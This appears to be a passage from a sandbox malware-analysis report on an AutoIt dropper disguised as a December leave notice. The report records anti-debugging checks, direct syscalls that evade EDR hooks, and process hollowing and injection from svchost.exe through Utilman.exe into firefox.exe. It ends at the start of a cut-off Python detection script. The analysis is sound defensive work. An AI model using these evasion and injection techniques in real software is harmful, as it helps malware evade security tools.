                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] (5 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h] (13 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h] (6 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h] (3 reads)
(fs:[00000030h] is the ProcessEnvironmentBlock pointer in the 32-bit TEB. Code that reads it is usually on its way to PEB.BeingDebugged, PEB.NtGlobalFlag or the process heap flags, the classic user-mode debugger checks, which is why the sandbox records every such read in the injected svchost.exe code.)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FBA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FA81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FA8189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | NtCreateKey: Direct from: 0x76EF2C6C
(A "direct" syscall is one the sandbox saw issued from the listed address rather than through the matching ntdll.dll export. User-mode hooks that EDR products place on those exports never see such a call, which is the point of the technique; the set above covers the full injection primitive set: allocate, write and protect remote memory, map a section, set thread context, resume and terminate threads, create a process.)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\svchost.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL | target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\Utilman.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\Utilman.exe | Section loaded: NULL | target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | protection: read write
Source: C:\Windows\SysWOW64\Utilman.exe | Section loaded: NULL | target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\Utilman.exe | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: read write
Source: C:\Windows\SysWOW64\Utilman.exe | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\Utilman.exe | Thread register set: target process: 5328
Source: C:\Windows\SysWOW64\Utilman.exe | Thread APC queued: target process: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Memory written: C:\Windows\SysWOW64\svchost.exe | base: 2F8F008
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FBB106 LogonUserW
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F83D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC411C SendInput,keybd_event
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC74E7 mouse_event
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Process created: C:\Windows\SysWOW64\svchost.exe | Command line: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"
Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe | Process created: C:\Windows\SysWOW64\Utilman.exe | Command line: "C:\Windows\SysWOW64\Utilman.exe"
Source: C:\Windows\SysWOW64\Utilman.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe | Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FBA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: Mandatory Notice for all December Leave and Vacation application.exe, eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: Mandatory Notice for all December Leave and Vacation application.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FA65C4 cpuid
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FFB340 GetUserNameW
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FB1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00F9DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
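The three "Process created" rows above are the chain the sandbox observed: svchost.exe is started with the sample's own path as its command line (the image/command-line mismatch that RunPE-style hollowing leaves behind), the random-named binary under Program Files (x86) starts Utilman.exe, and Utilman.exe, a Windows accessibility helper that winlogon or explorer would normally start, launches firefox.exe. The following Python is an added example and not part of the Joe Sandbox report: it runs three detection rules for exactly those shapes over constructed Sysmon-style process-creation events. The event layout, the PIDs and the accessibility-binary list are assumptions.

```python
import ntpath
from dataclasses import dataclass

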